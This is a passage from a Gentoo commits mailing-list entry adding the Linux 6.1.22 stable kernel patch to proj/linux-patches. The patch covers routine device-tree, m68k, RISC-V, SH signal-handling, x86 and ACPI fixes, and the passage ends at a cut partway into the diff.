^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-30 11:21 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-03-30 11:21 UTC (permalink / raw
  To: gentoo-commits

commit:     575a6ac1a723480547de2ed4dcbdff8e1e90a96c
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Mar 30 11:20:47 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Mar 30 11:20:47 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=575a6ac1

Linux patch 6.1.22

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1021_linux-6.1.22.patch | 9010 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9014 insertions(+)

diff --git a/0000_README b/0000_README
index 2837c0f3..dac87a0b 100644
--- a/0000_README
+++ b/0000_README
@@ -127,6 +127,10 @@ Patch:  1020_linux-6.1.21.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.21
 
+Patch:  1021_linux-6.1.22.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.22
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1021_linux-6.1.22.patch b/1021_linux-6.1.22.patch
new file mode 100644
index 00000000..bdd013bc
--- /dev/null
+++ b/1021_linux-6.1.22.patch
@@ -0,0 +1,9010 @@
+diff --git a/Makefile b/Makefile
+index 0a9f0770bdf3a..c3d44de8850cf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 21
++SUBLEVEL = 22
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/e60k02.dtsi b/arch/arm/boot/dts/e60k02.dtsi
+index 935e2359f8dfa..07ae964863850 100644
+--- a/arch/arm/boot/dts/e60k02.dtsi
++++ b/arch/arm/boot/dts/e60k02.dtsi
+@@ -302,6 +302,7 @@
+ 
+ &usbotg1 {
+ 	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	disable-over-current;
+ 	srp-disable;
+ 	hnp-disable;
+diff --git a/arch/arm/boot/dts/e70k02.dtsi b/arch/arm/boot/dts/e70k02.dtsi
+index 27ef9a62b23cf..a1f9fbd6004aa 100644
+--- a/arch/arm/boot/dts/e70k02.dtsi
++++ b/arch/arm/boot/dts/e70k02.dtsi
+@@ -312,6 +312,7 @@
+ 
+ &usbotg1 {
+ 	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	disable-over-current;
+ 	srp-disable;
+ 	hnp-disable;
+diff --git a/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts b/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts
+index 663ee9df79e67..d6eee157c63b7 100644
+--- a/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts
++++ b/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts
+@@ -597,6 +597,7 @@
+ 
+ &usbotg1 {
+ 	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	disable-over-current;
+ 	srp-disable;
+ 	hnp-disable;
+diff --git a/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts b/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts
+index ca2a43e0cbf61..3af4c76369741 100644
+--- a/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts
++++ b/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts
+@@ -99,8 +99,6 @@
+ 	phy-handle = <&ethphy0>;
+ 	nvmem-cells = <&fec_mac1>;
+ 	nvmem-cell-names = "mac-address";
+-	snps,reset-gpios = <&pca6416_1 2 GPIO_ACTIVE_LOW>;
+-	snps,reset-delays-us = <10 20 200000>;
+ 	status = "okay";
+ 
+ 	mdio {
+@@ -113,6 +111,10 @@
+ 			reg = <0>;
+ 			eee-broken-1000t;
+ 			qca,disable-smarteee;
++			qca,disable-hibernation-mode;
++			reset-gpios = <&pca6416_1 2 GPIO_ACTIVE_LOW>;
++			reset-assert-us = <20>;
++			reset-deassert-us = <200000>;
+ 			vddio-supply = <&vddio0>;
+ 
+ 			vddio0: vddio-regulator {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts b/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
+index 6357078185edd..0e8f0d7161ad0 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
+@@ -247,7 +247,7 @@
+ 		compatible = "wlf,wm8960";
+ 		reg = <0x1a>;
+ 		clocks = <&clk IMX8MM_CLK_SAI1_ROOT>;
+-		clock-names = "mclk1";
++		clock-names = "mclk";
+ 		wlf,shared-lrclk;
+ 		#sound-dai-cells = <0>;
+ 	};
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn.dtsi b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+index ba29b5b556ffa..37246ca9d9075 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+@@ -295,6 +295,7 @@
+ 				sai2: sai@30020000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30020000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 96 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI2_IPG>,
+ 						<&clk IMX8MN_CLK_DUMMY>,
+@@ -309,6 +310,7 @@
+ 				sai3: sai@30030000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30030000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 50 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI3_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+@@ -323,6 +325,7 @@
+ 				sai5: sai@30050000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30050000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 90 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI5_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+@@ -339,6 +342,7 @@
+ 				sai6: sai@30060000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30060000  0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 90 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI6_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+@@ -396,6 +400,7 @@
+ 				sai7: sai@300b0000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x300b0000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 111 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI7_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+diff --git a/arch/arm64/boot/dts/freescale/imx93.dtsi b/arch/arm64/boot/dts/freescale/imx93.dtsi
+index 0247866fc86b0..8ab9f8194702e 100644
+--- a/arch/arm64/boot/dts/freescale/imx93.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx93.dtsi
+@@ -150,6 +150,8 @@
+ 			lpi2c1: i2c@44340000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x44340000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 13 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C1_GATE>,
+ 					 <&clk IMX93_CLK_BUS_AON>;
+@@ -160,6 +162,8 @@
+ 			lpi2c2: i2c@44350000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x44350000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 14 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C2_GATE>,
+ 					 <&clk IMX93_CLK_BUS_AON>;
+@@ -277,6 +281,8 @@
+ 			lpi2c3: i2c@42530000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x42530000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 62 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C3_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -287,6 +293,8 @@
+ 			lpi2c4: i2c@42540000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x42540000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 63 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C4_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -351,6 +359,8 @@
+ 			lpi2c5: i2c@426b0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426b0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 195 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C5_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -361,6 +371,8 @@
+ 			lpi2c6: i2c@426c0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426c0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 196 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C6_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -371,6 +383,8 @@
+ 			lpi2c7: i2c@426d0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426d0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 197 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C7_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -381,6 +395,8 @@
+ 			lpi2c8: i2c@426e0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426e0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 198 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C8_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 516e70bf04ce9..346da6af51ac9 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -2077,6 +2077,8 @@
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie1_clkreq_n>;
+ 
++			dma-coherent;
++
+ 			iommus = <&apps_smmu 0x1c80 0x1>;
+ 
+ 			iommu-map = <0x0 &apps_smmu 0x1c80 0x1>,
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index 4a527a64772b4..47e09d96f6098 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1810,7 +1810,7 @@
+ 				      "slave_q2a",
+ 				      "tbu";
+ 
+-			iommus = <&apps_smmu 0x1d80 0x7f>;
++			iommus = <&apps_smmu 0x1d80 0x3f>;
+ 			iommu-map = <0x0   &apps_smmu 0x1d80 0x1>,
+ 				    <0x100 &apps_smmu 0x1d81 0x1>;
+ 
+@@ -1909,7 +1909,7 @@
+ 			assigned-clocks = <&gcc GCC_PCIE_1_AUX_CLK>;
+ 			assigned-clock-rates = <19200000>;
+ 
+-			iommus = <&apps_smmu 0x1e00 0x7f>;
++			iommus = <&apps_smmu 0x1e00 0x3f>;
+ 			iommu-map = <0x0   &apps_smmu 0x1e00 0x1>,
+ 				    <0x100 &apps_smmu 0x1e01 0x1>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index df0d888ffc008..4714d7bf03b9f 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -3104,6 +3104,7 @@
+ 			power-domains = <&gcc UFS_PHY_GDSC>;
+ 
+ 			iommus = <&apps_smmu 0xe0 0x0>;
++			dma-coherent;
+ 
+ 			interconnects = <&aggre1_noc MASTER_UFS_MEM 0 &mc_virt SLAVE_EBI1 0>,
+ 					<&gem_noc MASTER_APPSS_PROC 0 &config_noc SLAVE_UFS_MEM_CFG 0>;
+diff --git a/arch/m68k/kernel/traps.c b/arch/m68k/kernel/traps.c
+index 5c8cba0efc63e..a700807c9b6d9 100644
+--- a/arch/m68k/kernel/traps.c
++++ b/arch/m68k/kernel/traps.c
+@@ -30,6 +30,7 @@
+ #include <linux/init.h>
+ #include <linux/ptrace.h>
+ #include <linux/kallsyms.h>
++#include <linux/extable.h>
+ 
+ #include <asm/setup.h>
+ #include <asm/fpu.h>
+@@ -545,7 +546,8 @@ static inline void bus_error030 (struct frame *fp)
+ 			errorcode |= 2;
+ 
+ 		if (mmusr & (MMU_I | MMU_WP)) {
+-			if (ssw & 4) {
++			/* We might have an exception table for this PC */
++			if (ssw & 4 && !search_exception_tables(fp->ptregs.pc)) {
+ 				pr_err("Data %s fault at %#010lx in %s (pc=%#lx)\n",
+ 				       ssw & RW ? "read" : "write",
+ 				       fp->un.fmtb.daddr,
+diff --git a/arch/m68k/mm/motorola.c b/arch/m68k/mm/motorola.c
+index 2a375637e0077..9113012240789 100644
+--- a/arch/m68k/mm/motorola.c
++++ b/arch/m68k/mm/motorola.c
+@@ -437,7 +437,7 @@ void __init paging_init(void)
+ 	}
+ 
+ 	min_addr = m68k_memory[0].addr;
+-	max_addr = min_addr + m68k_memory[0].size;
++	max_addr = min_addr + m68k_memory[0].size - 1;
+ 	memblock_add_node(m68k_memory[0].addr, m68k_memory[0].size, 0,
+ 			  MEMBLOCK_NONE);
+ 	for (i = 1; i < m68k_num_memory;) {
+@@ -452,21 +452,21 @@ void __init paging_init(void)
+ 		}
+ 		memblock_add_node(m68k_memory[i].addr, m68k_memory[i].size, i,
+ 				  MEMBLOCK_NONE);
+-		addr = m68k_memory[i].addr + m68k_memory[i].size;
++		addr = m68k_memory[i].addr + m68k_memory[i].size - 1;
+ 		if (addr > max_addr)
+ 			max_addr = addr;
+ 		i++;
+ 	}
+ 	m68k_memoffset = min_addr - PAGE_OFFSET;
+-	m68k_virt_to_node_shift = fls(max_addr - min_addr - 1) - 6;
++	m68k_virt_to_node_shift = fls(max_addr - min_addr) - 6;
+ 
+ 	module_fixup(NULL, __start_fixup, __stop_fixup);
+ 	flush_icache();
+ 
+-	high_memory = phys_to_virt(max_addr);
++	high_memory = phys_to_virt(max_addr) + 1;
+ 
+ 	min_low_pfn = availmem >> PAGE_SHIFT;
+-	max_pfn = max_low_pfn = max_addr >> PAGE_SHIFT;
++	max_pfn = max_low_pfn = (max_addr >> PAGE_SHIFT) + 1;
+ 
+ 	/* Reserve kernel text/data/bss and the memory allocated in head.S */
+ 	memblock_reserve(m68k_memory[0].addr, availmem - m68k_memory[0].addr);
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index 8e5fd56820189..ae11d5647f9d4 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -442,6 +442,28 @@ config TOOLCHAIN_HAS_ZIHINTPAUSE
+ 	depends on !32BIT || $(cc-option,-mabi=ilp32 -march=rv32ima_zihintpause)
+ 	depends on LLD_VERSION >= 150000 || LD_VERSION >= 23600
+ 
++config TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
++	def_bool y
++	# https://sourceware.org/git/?p=binutils-gdb.git;a=commit;h=aed44286efa8ae8717a77d94b51ac3614e2ca6dc
++	depends on AS_IS_GNU && AS_VERSION >= 23800
++	help
++	  Newer binutils versions default to ISA spec version 20191213 which
++	  moves some instructions from the I extension to the Zicsr and Zifencei
++	  extensions.
++
++config TOOLCHAIN_NEEDS_OLD_ISA_SPEC
++	def_bool y
++	depends on TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
++	# https://github.com/llvm/llvm-project/commit/22e199e6afb1263c943c0c0d4498694e15bf8a16
++	depends on CC_IS_CLANG && CLANG_VERSION < 170000
++	help
++	  Certain versions of clang do not support zicsr and zifencei via -march
++	  but newer versions of binutils require it for the reasons noted in the
++	  help text of CONFIG_TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI. This
++	  option causes an older ISA spec compatible with these older versions
++	  of clang to be passed to GAS, which has the same result as passing zicsr
++	  and zifencei to -march.
++
+ config FPU
+ 	bool "FPU support"
+ 	default y
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index 8b4ddccea2795..3cb876f83187d 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -57,10 +57,12 @@ riscv-march-$(CONFIG_ARCH_RV64I)	:= rv64ima
+ riscv-march-$(CONFIG_FPU)		:= $(riscv-march-y)fd
+ riscv-march-$(CONFIG_RISCV_ISA_C)	:= $(riscv-march-y)c
+ 
+-# Newer binutils versions default to ISA spec version 20191213 which moves some
+-# instructions from the I extension to the Zicsr and Zifencei extensions.
+-toolchain-need-zicsr-zifencei := $(call cc-option-yn, -march=$(riscv-march-y)_zicsr_zifencei)
+-riscv-march-$(toolchain-need-zicsr-zifencei) := $(riscv-march-y)_zicsr_zifencei
++ifdef CONFIG_TOOLCHAIN_NEEDS_OLD_ISA_SPEC
++KBUILD_CFLAGS += -Wa,-misa-spec=2.2
++KBUILD_AFLAGS += -Wa,-misa-spec=2.2
++else
++riscv-march-$(CONFIG_TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI) := $(riscv-march-y)_zicsr_zifencei
++endif
+ 
+ # Check if the toolchain supports Zicbom extension
+ riscv-march-$(CONFIG_TOOLCHAIN_HAS_ZICBOM) := $(riscv-march-y)_zicbom
+diff --git a/arch/riscv/include/asm/tlbflush.h b/arch/riscv/include/asm/tlbflush.h
+index 801019381dea3..a09196f8de688 100644
+--- a/arch/riscv/include/asm/tlbflush.h
++++ b/arch/riscv/include/asm/tlbflush.h
+@@ -12,6 +12,8 @@
+ #include <asm/errata_list.h>
+ 
+ #ifdef CONFIG_MMU
++extern unsigned long asid_mask;
++
+ static inline void local_flush_tlb_all(void)
+ {
+ 	__asm__ __volatile__ ("sfence.vma" : : : "memory");
+diff --git a/arch/riscv/include/uapi/asm/setup.h b/arch/riscv/include/uapi/asm/setup.h
+new file mode 100644
+index 0000000000000..66b13a5228808
+--- /dev/null
++++ b/arch/riscv/include/uapi/asm/setup.h
+@@ -0,0 +1,8 @@
++/* SPDX-License-Identifier: GPL-2.0-only WITH Linux-syscall-note */
++
++#ifndef _UAPI_ASM_RISCV_SETUP_H
++#define _UAPI_ASM_RISCV_SETUP_H
++
++#define COMMAND_LINE_SIZE	1024
++
++#endif /* _UAPI_ASM_RISCV_SETUP_H */
+diff --git a/arch/riscv/mm/context.c b/arch/riscv/mm/context.c
+index 0f784e3d307bb..12e22e7330e7b 100644
+--- a/arch/riscv/mm/context.c
++++ b/arch/riscv/mm/context.c
+@@ -22,7 +22,7 @@ DEFINE_STATIC_KEY_FALSE(use_asid_allocator);
+ 
+ static unsigned long asid_bits;
+ static unsigned long num_asids;
+-static unsigned long asid_mask;
++unsigned long asid_mask;
+ 
+ static atomic_long_t current_version;
+ 
+diff --git a/arch/riscv/mm/tlbflush.c b/arch/riscv/mm/tlbflush.c
+index 37ed760d007c3..ef701fa83f368 100644
+--- a/arch/riscv/mm/tlbflush.c
++++ b/arch/riscv/mm/tlbflush.c
+@@ -42,7 +42,7 @@ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 	/* check if the tlbflush needs to be sent to other CPUs */
+ 	broadcast = cpumask_any_but(cmask, cpuid) < nr_cpu_ids;
+ 	if (static_branch_unlikely(&use_asid_allocator)) {
+-		unsigned long asid = atomic_long_read(&mm->context.id);
++		unsigned long asid = atomic_long_read(&mm->context.id) & asid_mask;
+ 
+ 		if (broadcast) {
+ 			sbi_remote_sfence_vma_asid(cmask, start, size, asid);
+diff --git a/arch/sh/include/asm/processor_32.h b/arch/sh/include/asm/processor_32.h
+index 27aebf1e75a20..3ef7adf739c83 100644
+--- a/arch/sh/include/asm/processor_32.h
++++ b/arch/sh/include/asm/processor_32.h
+@@ -50,6 +50,7 @@
+ #define SR_FD		0x00008000
+ #define SR_MD		0x40000000
+ 
++#define SR_USER_MASK	0x00000303	// M, Q, S, T bits
+ /*
+  * DSP structure and data
+  */
+diff --git a/arch/sh/kernel/signal_32.c b/arch/sh/kernel/signal_32.c
+index 90f495d35db29..a6bfc6f374911 100644
+--- a/arch/sh/kernel/signal_32.c
++++ b/arch/sh/kernel/signal_32.c
+@@ -115,6 +115,7 @@ static int
+ restore_sigcontext(struct pt_regs *regs, struct sigcontext __user *sc, int *r0_p)
+ {
+ 	unsigned int err = 0;
++	unsigned int sr = regs->sr & ~SR_USER_MASK;
+ 
+ #define COPY(x)		err |= __get_user(regs->x, &sc->sc_##x)
+ 			COPY(regs[1]);
+@@ -130,6 +131,8 @@ restore_sigcontext(struct pt_regs *regs, struct sigcontext __user *sc, int *r0_p
+ 	COPY(sr);	COPY(pc);
+ #undef COPY
+ 
++	regs->sr = (regs->sr & SR_USER_MASK) | sr;
++
+ #ifdef CONFIG_SH_FPU
+ 	if (boot_cpu_data.flags & CPU_HAS_FPU) {
+ 		int owned_fp;
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index 4386b10682ce4..8ca5e827f30b2 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -923,6 +923,7 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 
+ 		/* Event overflow */
+ 		handled++;
++		status &= ~mask;
+ 		perf_sample_data_init(&data, 0, hwc->last_period);
+ 
+ 		if (!x86_perf_event_set_period(event))
+@@ -935,8 +936,6 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 
+ 		if (perf_event_overflow(event, &data, regs))
+ 			x86_pmu_stop(event, 0);
+-
+-		status &= ~mask;
+ 	}
+ 
+ 	/*
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index 714166cc25f2f..0bab497c94369 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -1118,21 +1118,20 @@ void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+ 	zerofrom = offsetof(struct xregs_state, extended_state_area);
+ 
+ 	/*
+-	 * The ptrace buffer is in non-compacted XSAVE format.  In
+-	 * non-compacted format disabled features still occupy state space,
+-	 * but there is no state to copy from in the compacted
+-	 * init_fpstate. The gap tracking will zero these states.
+-	 */
+-	mask = fpstate->user_xfeatures;
+-
+-	/*
+-	 * Dynamic features are not present in init_fpstate. When they are
+-	 * in an all zeros init state, remove those from 'mask' to zero
+-	 * those features in the user buffer instead of retrieving them
+-	 * from init_fpstate.
++	 * This 'mask' indicates which states to copy from fpstate.
++	 * Those extended states that are not present in fpstate are
++	 * either disabled or initialized:
++	 *
++	 * In non-compacted format, disabled features still occupy
++	 * state space but there is no state to copy from in the
++	 * compacted init_fpstate. The gap tracking will zero these
++	 * states.
++	 *
++	 * The extended features have an all zeroes init state. Thus,
++	 * remove them from 'mask' to zero those features in the user
++	 * buffer instead of retrieving them from init_fpstate.
+ 	 */
+-	if (fpu_state_size_dynamic())
+-		mask &= (header.xfeatures | xinit->header.xcomp_bv);
++	mask = header.xfeatures;
+ 
+ 	for_each_extended_xfeature(i, mask) {
+ 		/*
+@@ -1151,9 +1150,8 @@ void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+ 			pkru.pkru = pkru_val;
+ 			membuf_write(&to, &pkru, sizeof(pkru));
+ 		} else {
+-			copy_feature(header.xfeatures & BIT_ULL(i), &to,
++			membuf_write(&to,
+ 				     __raw_xsave_addr(xsave, i),
+-				     __raw_xsave_addr(xinit, i),
+ 				     xstate_sizes[i]);
+ 		}
+ 		/*
+diff --git a/drivers/acpi/x86/s2idle.c b/drivers/acpi/x86/s2idle.c
+index c7afce465a071..e499c60c45791 100644
+--- a/drivers/acpi/x86/s2idle.c
++++ b/drivers/acpi/x86/s2idle.c
+@@ -384,29 +384,6 @@ static const struct acpi_device_id amd_hid_ids[] = {
+ 	{}
+ };
+ 
+-static int lps0_prefer_amd(const struct dmi_system_id *id)
+-{
+-	pr_debug("Using AMD GUID w/ _REV 2.\n");
+-	rev_id = 2;
+-	return 0;
+-}
+-static const struct dmi_system_id s2idle_dmi_table[] __initconst = {
+-	{
+-		/*
+-		 * AMD Rembrandt based HP EliteBook 835/845/865 G9
+-		 * Contains specialized AML in AMD/_REV 2 path to avoid
+-		 * triggering a bug in Qualcomm WLAN firmware. This may be
+-		 * removed in the future if that firmware is fixed.
+-		 */
+-		.callback = lps0_prefer_amd,
+-		.matches = {
+-			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
+-			DMI_MATCH(DMI_BOARD_NAME, "8990"),
+-		},
+-	},
+-	{}
+-};
+-
+ static int lps0_device_attach(struct acpi_device *adev,
+ 			      const struct acpi_device_id *not_used)
+ {
+@@ -586,7 +563,6 @@ static const struct platform_s2idle_ops acpi_s2idle_ops_lps0 = {
+ 
+ void __init acpi_s2idle_setup(void)
+ {
+-	dmi_check_system(s2idle_dmi_table);
+ 	acpi_scan_add_handler(&lps0_handler);
+ 	s2idle_set_ops(&acpi_s2idle_ops_lps0);
+ }
+diff --git a/drivers/acpi/x86/utils.c b/drivers/acpi/x86/utils.c
+index 4e816bb402f68..e45285d4e62a4 100644
+--- a/drivers/acpi/x86/utils.c
++++ b/drivers/acpi/x86/utils.c
+@@ -200,39 +200,28 @@ bool acpi_device_override_status(struct acpi_device *adev, unsigned long long *s
+  * a hardcoded allowlist for D3 support, which was used for these platforms.
+  *
+  * This allows quirking on Linux in a similar fashion.
++ *
++ * Cezanne systems shouldn't *normally* need this as the BIOS includes
++ * StorageD3Enable.  But for two reasons we have added it.
++ * 1) The BIOS on a number of Dell systems have ambiguity
++ *    between the same value used for _ADR on ACPI nodes GPP1.DEV0 and GPP1.NVME.
++ *    GPP1.NVME is needed to get StorageD3Enable node set properly.
++ *    https://bugzilla.kernel.org/show_bug.cgi?id=216440
++ *    https://bugzilla.kernel.org/show_bug.cgi?id=216773
++ *    https://bugzilla.kernel.org/show_bug.cgi?id=217003
++ * 2) On at least one HP system StorageD3Enable is missing on the second NVME
++      disk in the system.
+  */
+ static const struct x86_cpu_id storage_d3_cpu_ids[] = {
+ 	X86_MATCH_VENDOR_FAM_MODEL(AMD, 23, 96, NULL),	/* Renoir */
+ 	X86_MATCH_VENDOR_FAM_MODEL(AMD, 23, 104, NULL),	/* Lucienne */
+-	{}
+-};
+-
+-static const struct dmi_system_id force_storage_d3_dmi[] = {
+-	{
+-		/*
+-		 * _ADR is ambiguous between GPP1.DEV0 and GPP1.NVME
+-		 * but .NVME is needed to get StorageD3Enable node
+-		 * https://bugzilla.kernel.org/show_bug.cgi?id=216440
+-		 */
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Inspiron 14 7425 2-in-1"),
+-		}
+-	},
+-	{
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Inspiron 16 5625"),
+-		}
+-	},
++	X86_MATCH_VENDOR_FAM_MODEL(AMD, 25, 80, NULL),	/* Cezanne */
+ 	{}
+ };
+ 
+ bool force_storage_d3(void)
+ {
+-	const struct dmi_system_id *dmi_id = dmi_first_match(force_storage_d3_dmi);
+-
+-	return dmi_id || x86_match_cpu(storage_d3_cpu_ids);
++	return x86_match_cpu(storage_d3_cpu_ids);
+ }
+ 
+ /*
+diff --git a/drivers/atm/idt77252.c b/drivers/atm/idt77252.c
